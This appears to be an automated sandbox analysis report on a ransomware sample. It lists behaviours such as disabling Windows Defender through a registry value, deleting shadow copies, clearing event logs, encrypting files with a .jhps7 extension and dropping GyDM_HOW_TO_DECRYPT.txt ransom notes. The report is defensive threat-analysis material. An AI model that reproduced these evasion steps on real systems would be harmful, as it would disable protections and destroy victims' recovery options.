Analysis Overview
SHA256
e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d
Threat Level: Known bad
The file 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Hive
Modifies security service
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:26
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win10-en-20211208
Max time kernel
249s
Max time network
192s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
